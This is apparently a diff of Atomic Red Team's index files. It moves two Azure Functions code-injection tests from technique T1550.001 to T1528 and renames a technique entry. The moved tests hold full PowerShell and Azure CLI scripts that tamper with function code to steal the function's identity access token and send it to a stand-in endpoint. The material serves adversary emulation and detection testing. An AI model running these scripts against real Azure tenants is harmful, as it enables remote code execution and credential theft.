-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
-          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + $tmpOriginalFileName)\n
-          \   az storage file download --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
-          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
-          Upload new funciton code if download of existing code succeeded\n        if
-          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
-          file from file share for injection\n            $tmpFunctionCode = Join-Path
-          $env:temp/ (\"T1550.001_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
-          storage file download --account-name \"#{storage_account_name}\" --share-name
-          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
-          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code download failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
-          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
-          -Raw  # Load the content of the insert file\n            \n            $content
-          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
-          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
-          \           $content | Set-Content -Path $tmpFunctionCode       # Write
-          the modified content to the file\n            \n            # Upload file
-          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
-          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code upload failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
-          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
-          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
-          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
-          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
-          code upload failed.\"\n                exit 1\n            }\n            Write-Output
-          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
-          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original f file if upload succeeded
-              if ("#{execution_option}" -eq "insert_code") {
-                  $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
-                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
-              }
-
-              # Delete tmp original file
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
+    atomic_tests: []
  T1078.004:
    technique:
      type: attack-pattern
@@ -91627,7 +91411,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -91704,223 +91488,7 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
-    atomic_tests:
-    - name: Azure - Functions code upload - Functions code injection via Blob upload
-      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
-      description: "This test injects code into an Azure Function (RCE).\n\nAttack
-        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
-        to T1550.001 \"Azure - Functions code upload - Functions code injection to
-        retrieve the Functions identity access token\", the depicted code injection
-        scenario tampers the source code of Azure Functions to perform Subscription
-        Privilege Escalation by retrieving the identity access token of an Azure functions
-        instance. In this case, the prepared zip file (underlying package for a Function)
-        is expected to contain the tampered function presented in src/code_to_insert.py.
-        Note that the endpoint https://changeme.net needs to be adapted in your packed
-        function code.\n\nNote:\n- The Azure Function modified in this test must be
-        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
-        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
-        \n- For Function code upload to Azure Functions that are hosted via Azure
-        Files in a File Share, refer to T1550.001 \"Azure - Functions code upload
-        - Functions code injection to retrieve the Functions identity access token\".\n-
-        The required input fields can be retrieved in a reconnaissance step in test
-        T1619 \"Azure - Enumerate Storage Account Objects via Key-based authentication
-        using Azure CLI\". The code of function apps may be inspected and prepared
-        from the result of test T1530 \"Azure - Dump Azure Storage Account Objects
-        via Azure CLI\".\n\nRequirements:\n- The test is intended to be executed in
-        interactive mode (with -Interactive parameter) in order to complete the az
-        login command when MFA is required.\n- The EntraID user must have the role
-        \"Storage Account Contributor\", or a role with similar permissions."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        container_name:
-          type: string
-          default: container_name_example
-          description: Name of the container that contains the function blob
-        blob_name:
-          type: string
-          default: blob_example
-          description: Name of the function blob
-        file_path_blob:
-          type: path
-          default: "$env:temp/T1550.001_function_code.zip"
-          description: Path to the function code file to upload as blob
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {    \n    $connectionString = az storage account
-          show-connection-string --name \"#{storage_account_name}\" --query connectionString
-          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + \"#{blob_name}\")\n
-          \   az storage blob download --connection-string $connectionString --container-name
-          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
-          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
-          blob version if download of existing blob succeeded\n        az storage
-          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
-          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}\n"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original blob file if upload succeeded
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
-    - name: Azure - Functions code upload - Functions code injection via File Share
-        modification to retrieve the Functions identity access token
-      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
-      description: "This test injects code into an Azure Function (RCE) to perform
-        Subscription Privilege Escalation by retrieving the identity access token
-        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
-        executed, the \"https://changeme\" will retrieve the access token when the
-        function app is executed on behalf of the tenant. The function may be triggered
-        manually from authorized people, triggered in regular intervals, or in various
-        other ways. The access token can then be used to perform further attack steps
-        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
-        \n- The Azure Function modified in this test must be hosted via Azure Files
-        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
-        For Function code upload to Azure Functions that are hosted via Azure Blob
-        storage, refer to T1550.001 \"Azure - Functions code upload - Functions code
-        injection via Blob upload\".\n- The required input fields can be retrieved
-        in a reconnaissance step in test T1619 \"Azure - Enumerate Storage Account
-        Objects via Key-based authentication using Azure CLI\". The code of function
-        apps may be inspected and prepared from the result of test T1530 \"Azure -
-        Dump Azure Storage Account Objects via Azure CLI\".\n- Important: Change the
-        https://changeme.net in code_to_insert_path to a self-controlled endpoint.
-        This endpoint can be hosted e.g. as request bin via Pipedream to display the
-        body of incoming POST requests.\n- The default injected code to retrieve the
-        access token can be replaced by arbitrary other code. In this case: Replace
-        the code defined in code_to_insert_path\n\nRequirements:\n- The test is intended
-        to be executed in interactive mode (with -Interactive parameter) in order
-        to complete the az login command when MFA is required.\n- The EntraID user
-        must have the role \"Storage Account Contributor\", or a role with similar
-        permissions.\n\nExecution options: Defined by the input field execution_option\n-
-        insert_code: This option (1) downloads the existing funciton code into a tmp
-        file, (2) injects the code from code_to_insert_path at the beginning of the
-        file, and (3) uploads the tampered file to the targeted Azure Function code
-        (Azure File Share File).\n- replace_file: This option uploads the function
-        code defined in code_to_insert_path to the targeted Azure Function code (Azure
-        File Share File)."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        execution_option:
-          type: string
-          default: insert_code
-          description: Chooses execution option insert_code, or replace_file
-        file_share_name:
-          type: string
-          default: file_share_name_example
-          description: Name of the file share that is related to the Function
-        file_path:
-          type: path
-          default: site/wwwroot/function_app.py
-          description: Path to the Function file in the file share
-        code_to_insert_path:
-          type: path
-          default: "$PathToAtomicsFolder/T1550.001/src/code_to_insert.py"
-          description: The code that will be injected into the Function
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
-          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + $tmpOriginalFileName)\n
-          \   az storage file download --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
-          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
-          Upload new funciton code if download of existing code succeeded\n        if
-          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
-          file from file share for injection\n            $tmpFunctionCode = Join-Path
-          $env:temp/ (\"T1550.001_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
-          storage file download --account-name \"#{storage_account_name}\" --share-name
-          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
-          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code download failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
-          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
-          -Raw  # Load the content of the insert file\n            \n            $content
-          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
-          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
-          \           $content | Set-Content -Path $tmpFunctionCode       # Write
-          the modified content to the file\n            \n            # Upload file
-          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
-          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code upload failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
-          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
-          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
-          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
-          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
-          code upload failed.\"\n                exit 1\n            }\n            Write-Output
-          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
-          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original f file if upload succeeded
-              if ("#{execution_option}" -eq "insert_code") {
-                  $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
-                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
-              }
-
-              # Delete tmp original file
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
+    atomic_tests: []
 credential-access:
  T1557:
    technique:
@@ -100111,7 +99679,222 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
-    atomic_tests: []
+      identifier: T1528
+    atomic_tests:
+    - name: Azure - Functions code upload - Functions code injection via Blob upload
+      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
+      description: "This test injects code into an Azure Function (RCE).\n\nAttack
+        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
+        to T1528 \"Azure - Functions code upload - Functions code injection to retrieve
+        the Functions identity access token\", the depicted code injection scenario
+        tampers the source code of Azure Functions to perform Subscription Privilege
+        Escalation by retrieving the identity access token of an Azure functions instance.
+        In this case, the prepared zip file (underlying package for a Function) is
+        expected to contain the tampered function presented in src/code_to_insert.py.
+        Note that the endpoint https://changeme.net needs to be adapted in your packed
+        function code.\n\nNote:\n- The Azure Function modified in this test must be
+        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
+        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
+        \n- For Function code upload to Azure Functions that are hosted via Azure
+        Files in a File Share, refer to T1528 \"Azure - Functions code upload - Functions
+        code injection to retrieve the Functions identity access token\".\n- The required
+        input fields can be retrieved in a reconnaissance step in test T1619 \"Azure
+        - Enumerate Storage Account Objects via Key-based authentication using Azure
+        CLI\". The code of function apps may be inspected and prepared from the result
+        of test T1530 \"Azure - Dump Azure Storage Account Objects via Azure CLI\".\n\nRequirements:\n-
+        The test is intended to be executed in interactive mode (with -Interactive
+        parameter) in order to complete the az login command when MFA is required.\n-
+        The EntraID user must have the role \"Storage Account Contributor\", or a
+        role with similar permissions."
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        storage_account_name:
+          type: string
+          default: storage_account_name_example
+          description: Name of storage account that is related to the Function
+        container_name:
+          type: string
+          default: container_name_example
+          description: Name of the container that contains the function blob
+        blob_name:
+          type: string
+          default: blob_example
+          description: Name of the function blob
+        file_path_blob:
+          type: path
+          default: "$env:temp/T1528_function_code.zip"
+          description: Path to the function code file to upload as blob
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Azure CLI must be installed
+        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+        get_prereq_command: Install-Module -Name Az -Force
+      executor:
+        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
+          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
+          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
+          be true or null\n    Write-Output \"Shared key access is disabled for this
+          storage account.\"\n} else {    \n    $connectionString = az storage account
+          show-connection-string --name \"#{storage_account_name}\" --query connectionString
+          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
+          = Join-Path $env:temp/ (\"T1528_tmp_original_\" + \"#{blob_name}\")\n    az
+          storage blob download --connection-string $connectionString --container-name
+          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
+          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
+          blob version if download of existing blob succeeded\n        az storage
+          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
+          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
+          \   } else {\n        Write-Output \"Download original function code failed.\"\n
+          \       exit 1\n    }\n}\n"
+        cleanup_command: |-
+          az login    # Log in to Azure CLI
+
+          # Upload previous funciton code
+          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + "#{blob_name}")
+          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
+
+          if ($LASTEXITCODE -eq 0) {
+              Write-Output "Uploaded original version of function code."
+
+              # Delete tmp original blob file if upload succeeded
+              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
+          } else {
+              Write-Output "Upload original function code failed."
+          }
+        name: powershell
+        elevation_required: false
+    - name: Azure - Functions code upload - Functions code injection via File Share
+        modification to retrieve the Functions identity access token
+      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
+      description: "This test injects code into an Azure Function (RCE) to perform
+        Subscription Privilege Escalation by retrieving the identity access token
+        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
+        executed, the \"https://changeme\" will retrieve the access token when the
+        function app is executed on behalf of the tenant. The function may be triggered
+        manually from authorized people, triggered in regular intervals, or in various
+        other ways. The access token can then be used to perform further attack steps
+        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
+        \n- The Azure Function modified in this test must be hosted via Azure Files
+        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
+        For Function code upload to Azure Functions that are hosted via Azure Blob
+        storage, refer to T1528 \"Azure - Functions code upload - Functions code injection
+        via Blob upload\".\n- The required input fields can be retrieved in a reconnaissance
+        step in test T1619 \"Azure - Enumerate Storage Account Objects via Key-based
+        authentication using Azure CLI\". The code of function apps may be inspected
+        and prepared from the result of test T1530 \"Azure - Dump Azure Storage Account
+        Objects via Azure CLI\".\n- Important: Change the https://changeme.net in
+        code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted
+        e.g. as request bin via Pipedream to display the body of incoming POST requests.\n-
+        The default injected code to retrieve the access token can be replaced by
+        arbitrary other code. In this case: Replace the code defined in code_to_insert_path\n\nRequirements:\n-
+        The test is intended to be executed in interactive mode (with -Interactive
+        parameter) in order to complete the az login command when MFA is required.\n-
+        The EntraID user must have the role \"Storage Account Contributor\", or a
+        role with similar permissions.\n\nExecution options: Defined by the input
+        field execution_option\n- insert_code: This option (1) downloads the existing
+        funciton code into a tmp file, (2) injects the code from code_to_insert_path
+        at the beginning of the file, and (3) uploads the tampered file to the targeted
+        Azure Function code (Azure File Share File).\n- replace_file: This option
+        uploads the function code defined in code_to_insert_path to the targeted Azure
+        Function code (Azure File Share File)."
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        storage_account_name:
+          type: string
+          default: storage_account_name_example
+          description: Name of storage account that is related to the Function
+        execution_option:
+          type: string
+          default: insert_code
+          description: Chooses execution option insert_code, or replace_file
+        file_share_name:
+          type: string
+          default: file_share_name_example
+          description: Name of the file share that is related to the Function
+        file_path:
+          type: path
+          default: site/wwwroot/function_app.py
+          description: Path to the Function file in the file share
+        code_to_insert_path:
+          type: path
+          default: "$PathToAtomicsFolder/T1528/src/code_to_insert.py"
+          description: The code that will be injected into the Function
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Azure CLI must be installed
+        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+        get_prereq_command: Install-Module -Name Az -Force
+      executor:
+        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
+          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
+          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
+          be true or null\n    Write-Output \"Shared key access is disabled for this
+          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
+          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
+          = Join-Path $env:temp/ (\"T1528_tmp_original_\" + $tmpOriginalFileName)\n
+          \   az storage file download --account-name \"#{storage_account_name}\"
+          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
+          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
+          Upload new funciton code if download of existing code succeeded\n        if
+          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
+          file from file share for injection\n            $tmpFunctionCode = Join-Path
+          $env:temp/ (\"T1528_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
+          storage file download --account-name \"#{storage_account_name}\" --share-name
+          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
+          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
+          \"Function code download failed.\"\n                exit 1\n            }\n
+          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
+          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
+          -Raw  # Load the content of the insert file\n            \n            $content
+          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
+          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
+          \           $content | Set-Content -Path $tmpFunctionCode       # Write
+          the modified content to the file\n            \n            # Upload file
+          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
+          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
+          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
+          \"Function code upload failed.\"\n                exit 1\n            }\n
+          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
+          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
+          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
+          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
+          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
+          code upload failed.\"\n                exit 1\n            }\n            Write-Output
+          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
+          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
+          \   } else {\n        Write-Output \"Download original function code failed.\"\n
+          \       exit 1\n    }\n}"
+        cleanup_command: |-
+          az login    # Log in to Azure CLI
+
+          # Upload previous funciton code
+          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
+          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + $tmpOriginalFileName)
+          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
+
+          if ($LASTEXITCODE -eq 0) {
+              Write-Output "Uploaded original version of function code."
+
+              # Delete tmp original f file if upload succeeded
+              if ("#{execution_option}" -eq "insert_code") {
+                  $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
+                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
+                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
+              }
+
+              # Delete tmp original file
+              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
+          } else {
+              Write-Output "Upload original function code failed."
+          }
+        name: powershell
+        elevation_required: false
  T1552.006:
    technique:
      type: attack-pattern
@@ -17975,7 +17975,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -18052,7 +18052,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -53069,7 +53068,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -53146,7 +53145,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -57710,6 +57708,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -16469,7 +16469,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -16546,7 +16546,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -49641,7 +49640,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -49718,7 +49717,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -53452,6 +53450,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -14385,7 +14385,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14462,7 +14462,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
